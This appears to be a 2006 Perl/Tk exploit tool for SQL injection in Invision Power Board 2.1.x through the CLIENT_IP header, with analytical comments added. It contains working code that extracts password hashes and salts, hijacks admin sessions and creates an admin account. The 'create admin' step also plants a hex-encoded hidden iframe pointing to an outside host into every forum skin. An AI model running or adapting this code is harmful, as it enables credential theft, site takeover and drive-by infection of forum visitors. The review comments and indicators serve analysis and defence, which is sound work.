#!/usr/bin/perl

## Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC
## Based on LOCAL_IP bug, more info in RST/GHC Advisory#41
## http://rst.void.ru/papers/advisory41.txt
## tested on 2.1.3, 2.1.6
##
## 08.06.06
## (c)oded by 1dt.w0lf
## RST/GHC
## http://rst.void.ru
## http://ghc.ru

# Review notes (how this script behaves, for anyone analysing it):
#  - Tk GUI wrapper around five HTTP actions (test_vuln, get_prefix, get_data,
#    get_admin, create_admin, defined below MainLoop).  Every read action sends
#    a GET to index.php whose CLIENT_IP request header carries a SQL fragment
#    starting with `' UNION SELECT`, and reads the result back out of the
#    `ipb_var_s = "..."` JavaScript variable in the response body.  In other
#    words the application treats CLIENT_IP as the client address and builds
#    SQL from it without escaping.
#  - Traffic signature, all visible in this file: query string
#    `?s=r57ipb216_for_IDS` (sub session), an empty User-Agent header, the
#    CLIENT_IP header above, and for create_admin two POSTs to admin.php with
#    act=mem/code=doadd and act=sql/code=runsql.
#  - create_admin does more than its label says: after adding the account it
#    runs an UPDATE on <prefix>skin_sets that appends a hidden iframe to every
#    skin wrapper (see the hex literal in that sub).
#  - No `use strict`/`use warnings`; every variable below is a package global
#    shared between the widgets (-textvariable/-variable) and the subs.

use Tk;
use Tk::BrowseEntry;
use Tk::DialogBox;
use LWP::UserAgent;

# Indirect-object syntax (`new MainWindow`); MainWindow->new(...) is the
# preferred spelling.
$mw = new MainWindow(title => "r57ipb216gui" );

$mw->geometry ( '420x550' ) ;
$mw->resizable(0,0);

$mw->Label(-text => '!', -font => '{Webdings} 22')->pack();
$mw->Label(-text => 'Invision Power Board 2.1.* <= 2.1.6 sql injection exploit by RST/GHC', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$mw->Label(-text => '')->pack();

# Two columns: labels on the left, input widgets on the right.  Pack order
# below determines the layout, so the statement order matters.
$fleft=$mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ;
$fright=$mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ;

# Defaults for the GUI fields.  All of these are interpolated verbatim into
# the requests built in the subs below.
$url = 'http://server/forum/index.php';           # target index.php; create_admin derives admin.php from it
$user_id = '1';                                   # member id used in WHERE clauses
$prefix = 'ibf_';                                 # table prefix, overwritten by get_prefix
$table = 'members';                               # table selector for get_data
$column = 'member_login_key';                     # column selector for get_data
$new_admin_name = 'rstghc';
$new_admin_password = 'rstghc';
$new_admin_email = 'billy@microsoft.com';
$report = '';                                     # filled by get_data
$group = 4;                                       # mgroup submitted by create_admin; get_admin overwrites it
$curr_user = 0;                                   # checkbox: restrict get_admin to $user_id's session
$rand_session = &session();                       # not random: a fixed marker string, see sub session
$use_custom_fields = 0;                           # checkbox: merge $custom_fields into the create_admin POST
$custom_fields = 'name1=value1,name2=value2';     # "k=v,k=v" list, split on ',' then '='

$fleft->Label ( -text => 'Path to forum index: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$url) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'User ID: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$user_id) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'Database tables prefix: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$prefix) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fright->Label( -text => ' ')->pack();
$fleft->Label( -text => ' ')->pack();

$fleft->Label ( -text => 'get data from database', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Label( -text => ' ')->pack();

# Table selector; choosing an entry calls update_columns, which repopulates $b.
$fleft->Label ( -text => 'Get data from table: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$b2 = $fright->BrowseEntry( -command => \&update_columns, -relief => "groove", -variable => \$table, -font => '{Verdana} 8');
$b2->insert("end", "members");
$b2->insert("end", "members_converge");
$b2->pack( -side => "top" , -anchor => 'w');

# Column selector.  NOTE: $b (like $a) is one of Perl's sort() package
# variables; it works as a widget handle here only because nothing in this
# file calls sort, so avoid copying the name into new code.
$fleft->Label ( -text => 'Get data from column: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$b = $fright->BrowseEntry( -relief => "groove", -variable => \$column, -font => '{Verdana} 8');
$b->insert("end", "member_login_key");
$b->insert("end", "name");
$b->insert("end", "ip_address");
$b->insert("end", "legacy_password");
$b->insert("end", "email");
$b->pack( -side => "top" , -anchor => 'w' );

$fleft->Label ( -text => 'Returned data: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$report) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'create new admin', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Label( -text => ' ')->pack();

$fleft->Label ( -text => ' ')->pack();

$fright->Checkbutton( -font => '{Verdana} 8', -text => 'Get admin session for inserted user ID', -variable => \$curr_user)->pack(-side => "top" , -anchor => 'w');

# $session_id and $session_ip_address have no default; they are either typed
# in here or filled by get_admin, and create_admin refuses to run while
# either is empty.
$fleft->Label ( -text => 'session_id: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$session_id) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'session_ip_address: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$session_ip_address) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'new admin name: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_name) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'new admin password: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_password) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'new_admin_email: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_email) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => ' ')->pack();
$fright->Checkbutton( -font => '{Verdana} 8', -text => 'Use custom profile fields', -variable => \$use_custom_fields)->pack(-side => "top" , -anchor => 'w');

$fleft->Label ( -text => 'custom fields: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$custom_fields) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fright->Label( -text => ' ')->pack();

# Action buttons; each -command is one of the subs defined after MainLoop.
$fright->Button(-text => 'Test forum vulnerability',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => \&test_vuln
)->pack();

$fright->Button(-text => 'Get database tables prefix',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => \&get_prefix
)->pack();

$fright->Button(-text => 'Get data from database',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => \&get_data
)->pack();

$fright->Button(-text => 'Get admin session',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => \&get_admin
)->pack();

$fright->Button(-text => 'Create new admin',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => \&create_admin
)->pack();



$fleft->Label( -text => ' ')->pack();
$fleft->Label( -text => ' ')->pack();
$fleft->Label( -text => ' ')->pack();
$fleft->Label( -text => '(c)oded by 1dt.w0lf', -font => '{Verdana} 7')->pack();
$fleft->Label( -text => 'RST/GHC', -font => '{Verdana} 7')->pack();
$fleft->Label( -text => 'http://rst.void.ru', -font => '{Verdana} 7')->pack();
$fleft->Label( -text => 'http://ghc.ru', -font => '{Verdana} 7')->pack();

# Tk event loop; nothing below this line runs until a button is pressed.
MainLoop();
  160.  
  161. sub update_columns()
  162. {
  163. $b->delete(0,"end");
  164. if($table eq 'members'){
  165. $column = "member_login_key";
  166. $b->insert("end", "member_login_key");
  167. $b->insert("end", "name");
  168. $b->insert("end", "ip_address");
  169. $b->insert("end", "legacy_password");
  170. $b->insert("end", "email");
  171. } elsif($table eq 'members_converge'){
  172. $column = "converge_pass_hash";
  173. $b->insert("end", "converge_pass_hash");
  174. $b->insert("end", "converge_pass_salt");
  175. $b->insert("end", "converge_email");
  176. }
  177. }
  178.  
sub get_admin()
{
    # "Get admin session" button.  Walks the <prefix>admin_sessions table one
    # column per request through the CLIENT_IP injection and stores what it
    # finds in the globals $session_ip_address, $session_id, $session_user_id,
    # $group and $name; create_admin later reads the first two and $group.
    # Outcome is reported in a DialogBox.
    $xpl = LWP::UserAgent->new( ) or die;
    $InfoWindow=$mw->DialogBox(-title => 'get admin session', -buttons => ["OK"]);
    # Checkbox "Get admin session for inserted user ID": restrict the lookup
    # to member $user_id ($user_id comes from the GUI field, unquoted).
    if($curr_user == 1) { $sql = "AND session_member_id = $user_id"; }
    else { $sql = ''; }
    # Request 1: session_ip_address of an admin session active in the last
    # two hours.  The header value closes the quoted string, UNIONs four
    # columns and comments out the tail of the original query with /*.
    $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_ip_address,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) $sql LIMIT 1/*");
    $error = 0;
    $rep = '';
    if($res->is_success)
    {
        # The UNIONed value is echoed in the page's `ipb_var_s = "..."` JS
        # variable; $3 is the quoted text (greedy `.*`, so the first such
        # line in the response wins).
        if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
        # Only a dotted-quad-looking value counts as a hit; anything else
        # (including an empty string) means "no session".
        if($rep =~ /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/) { $session_ip_address = $rep; }
        else { $error = 1; }
        if(!$error)
        {
            $rep = '';
            # Request 2: session_id bound to that address.  Unlike request 1,
            # this and the following requests parse the body without checking
            # $res->is_success.
            $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) and session_ip_address = '$session_ip_address' $sql LIMIT 1/*");
            if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; $session_id = $rep; }
            else { $error = 1; }
            if(!$error){
                if($curr_user != 1)
                {
                    # Request 3: member id owning that session (skipped when
                    # the user pinned a specific id via the checkbox).
                    $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_member_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_id = '$session_id' LIMIT 1/*");
                    if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $session_user_id = $3; }
                }
                else
                {
                    $session_user_id = $user_id;
                }
                # Requests 4 and 5: group id and display name of that member.
                # $group replaces the default (4) and is what create_admin
                # submits as mgroup.
                $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT mgroup,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*");
                if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $group = $3; }
                $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT name,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*");
                if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $name = $3; }
            }
            # NOTE: this "Found session!" dialog is shown even when request 2
            # set $error, and the `if($error)` block at the bottom then adds
            # labels to a DialogBox that has already been destroyed.
            $InfoWindow->add('Label', -text => 'Found session!', -font => '{Verdana} 8 bold',-foreground=>'Green')->pack;
            $InfoWindow->add('Label', -text => 'session_ip_address: '.$session_ip_address, -font => '{Verdana} 8')->pack;
            $InfoWindow->add('Label', -text => 'session_id: '.$session_id, -font => '{Verdana} 8')->pack;
            $InfoWindow->add('Label', -text => 'user_id: '.$session_user_id, -font => '{Verdana} 8')->pack;
            $InfoWindow->add('Label', -text => 'username: '.$name, -font => '{Verdana} 8')->pack;
            $InfoWindow->add('Label', -text => 'group: '.$group, -font => '{Verdana} 8')->pack;
            $InfoWindow->Show();
            $InfoWindow->destroy;
        }
    }
    else
    {
        # HTTP-level failure of request 1 (non-2xx status).
        $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
        $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
        $InfoWindow->Show();
        $InfoWindow->destroy;
    }
    if($error)
    {
        # No usable row came back from request 1 or 2.
        $InfoWindow->add('Label', -text => 'Can\'t get admin session.', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
        $InfoWindow->add('Label', -text => 'Maybe admin session not exist. Please try later.', -font => '{Verdana} 8')->pack;
        $InfoWindow->Show();
        $InfoWindow->destroy;
    }
}
  239.  
sub get_data()
{
    # "Get data from database" button.  Reads one $column of the row with
    # id $user_id from <prefix><table> via the CLIENT_IP injection and writes
    # the value into $report (bound to the "Returned data" entry).
    $xpl = LWP::UserAgent->new( ) or die;
    $InfoWindow=$mw->DialogBox(-title => 'get data from database', -buttons => ["OK"]);
    # Primary-key column differs per table.  If $table is neither value
    # $id_text is left untouched (it is a global, so a stale value from an
    # earlier call would be reused).
    if($table eq 'members') { $id_text = 'id'; }
    if($table eq 'members_converge') { $id_text = 'converge_id'; }

    # $column, $prefix, $table and $user_id are concatenated straight from
    # the GUI fields into the SQL fragment.
    $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT ".$column.",1,1,1 FROM ".$prefix.$table." WHERE ".$id_text."=".$user_id."/*");
    if($res->is_success)
    {
        $rep = '';   # unused here; the match below writes $report directly
        # Value is echoed in the `ipb_var_s = "..."` JS variable of the page.
        if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/){ $report = $3; }
        else
        {
            $InfoWindow->add('Label', -text => 'Can\'t get data from database', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
            $InfoWindow->Show();
            $InfoWindow->destroy;
        }
    }
    else
    {
        # HTTP-level failure (non-2xx status).
        $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
        $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
        $InfoWindow->Show();
        $InfoWindow->destroy;
    }
}
  267.  
sub create_admin()
{
    # "Create new admin" button.  Requires $session_id and $session_ip_address
    # (typed in or filled by get_admin).  Sends two POSTs to admin.php using
    # the harvested admin session: one adds a member with mgroup $group, the
    # second runs an arbitrary SQL statement through the admin "runsql"
    # action.  See the note on $if below for what that statement does.
    $InfoWindow=$mw->DialogBox(-title => 'create new admin', -buttons => ["OK"]);
    if($session_id eq '' || $session_ip_address eq '')
    {
        $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
        $InfoWindow->add('Label', -text => 'You need insert admin session_id and session_ip_address', -font => '{Verdana} 8')->pack;
    }
    elsif($session_ip_address !~ /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
    {
        $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
        $InfoWindow->add('Label', -text => 'session_ip_address wrong!', -font => '{Verdana} 8')->pack;
    }
    else
    {
        $xpl = LWP::UserAgent->new( ) or die;
        # admin.php lives next to index.php; the substitution is unanchored
        # and `.` is unescaped, so any "index" + one char + "php" matches.
        ($url2 = $url) =~ s/index.php/admin.php/;
        $cf = '';   # unused
        # Form fields of the ACP "add member" action.
        %fields = (
        'code' => 'doadd',
        'act' => 'mem',
        'section' => 'content',
        'name' => $new_admin_name,
        'password' => $new_admin_password,
        'email' => $new_admin_email,
        'mgroup' => $group,
        );
        if($use_custom_fields)
        {
            # "k=v,k=v" from the GUI field; later keys overwrite earlier ones,
            # including the fixed keys above.
            @cf = split(',',$custom_fields);
            foreach(@cf) { ($k,$v) = split('=',$_); $fields{$k} = $v;}
        }

        # Both POSTs carry the session's IP in CLIENT_IP and X_FORWARDED_FOR;
        # presumably because the admin session is tied to that address on the
        # server side — not verifiable from this file.
        $res = $xpl->post($url2."?adsess=$session_id",
        [
        %fields,
        ],
        'USER_AGENT'=>'',
        'CLIENT_IP'=>"$session_ip_address",
        'X_FORWARDED_FOR'=>"$session_ip_address");
        # Hex-encoded HTML fragment passed to MySQL as a 0x... literal.  It
        # decodes to a hidden <div> containing a 1x1 <iframe> that loads a page
        # from a third-party host (zchxsikpgz[.]biz) — i.e. this action also
        # plants a drive-by iframe in every skin of the target board.  Treat
        # the hex string and that host as indicators when reviewing logs or a
        # compromised skin_sets table.
        $if = '0x3C646976207374796C653D225649534942494C4954593A2068696464656E223E3C696672616D65207372633D22687474703A2F2F7A63687873696B70677A2E62697A2F646C2F6164763534332E706870222077696474683D31206865696768743D313E3C2F696672616D653E3C2F6469763E';
        # Appends the fragment to set_wrapper and set_cache_wrapper of all rows.
        $query = "UPDATE ".$prefix."skin_sets SET set_wrapper = CONCAT(set_wrapper,".$if."), set_cache_wrapper = CONCAT(set_cache_wrapper,".$if.")";
        $res = $xpl->post($url2."?adsess=$session_id",
        [
        'code' => 'runsql',
        'act' => 'sql',
        'section' => 'admin',
        'query' => $query,
        ],
        'USER_AGENT'=>'',
        'CLIENT_IP'=>"$session_ip_address",
        'X_FORWARDED_FOR'=>"$session_ip_address");
        # NOTE: neither POST's response is inspected; "Done!" is reported
        # unconditionally.
        $InfoWindow->add('Label', -text => 'Done!', -font => '{Verdana} 8 bold',-foreground=>'green')->pack;
        $InfoWindow->add('Label', -text => 'New admin created', -font => '{Verdana} 8 bold')->pack;
    }
    $InfoWindow->Show();
    $InfoWindow->destroy;
}
  326.  
sub test_vuln()
{
    # "Test forum vulnerability" button.  Sends a CLIENT_IP header whose
    # UNION selects the constant string 'VULN' and checks whether that string
    # comes back in the page's `ipb_var_s = "..."` JS variable.
    $InfoWindow=$mw->DialogBox(-title => 'test forum vulnerability', -buttons => ["OK"]);
    $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
    $InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack;
    $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
    $xpl = LWP::UserAgent->new( ) or die;
    $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT 'VULN',1,1,1/*");
    if($res->is_success)
    {
        $rep = '';
        if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
        # "UNVULNERABLE" also covers the case where the page simply has no
        # ipb_var_s line, so it is not a proof of absence.
        if($rep eq 'VULN') { $InfoWindow->add('Label', -text => 'FORUM VULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; }
        else { $InfoWindow->add('Label', -text => 'FORUM UNVULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'green')->pack; }
    }
    else
    {
        # HTTP-level failure (non-2xx status).
        $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
        $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
    }
    $InfoWindow->Show();
    $InfoWindow->destroy;
}
  350.  
  351.  
sub get_prefix()
{
    # "Get database tables prefix" button.  Sends a lone single quote in
    # CLIENT_IP so the server returns a SQL error that echoes the failing
    # query, then lifts the table prefix out of "FROM <prefix>sessions".
    # Relies on the application printing database errors to the page.
    $InfoWindow=$mw->DialogBox(-title => 'get database tables prefix', -buttons => ["OK"]);
    $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
    $InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack;
    $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
    $xpl = LWP::UserAgent->new( ) or die;
    $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"'");
    if($res->is_success)
    {
        $rep = '';   # unused
        # Greedy, unanchored: $1 is everything between the first "FROM " and
        # the last "sessions" on that line, which is only the prefix when the
        # echoed query is short.
        if($res->as_string =~ /FROM (.*)sessions/)
        {
            $prefix = $1;   # global, bound to the "Database tables prefix" entry
            $InfoWindow->add('Label', -text => 'Prefix: '.$prefix, -font => '{Verdana} 8 bold')->pack;
        }
        else
        {
            $InfoWindow->add('Label', -text => 'Can\'t get prefix', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; }
    }
    else
    {
        # HTTP-level failure (non-2xx status).
        $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
        $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
    }
    $InfoWindow->Show();
    $InfoWindow->destroy;
}
  380.  
  381. sub session()
  382. {
  383. return 'r57ipb216_for_IDS';
  384. }
  385.  
  386. # milw0rm.com [2006-07-14]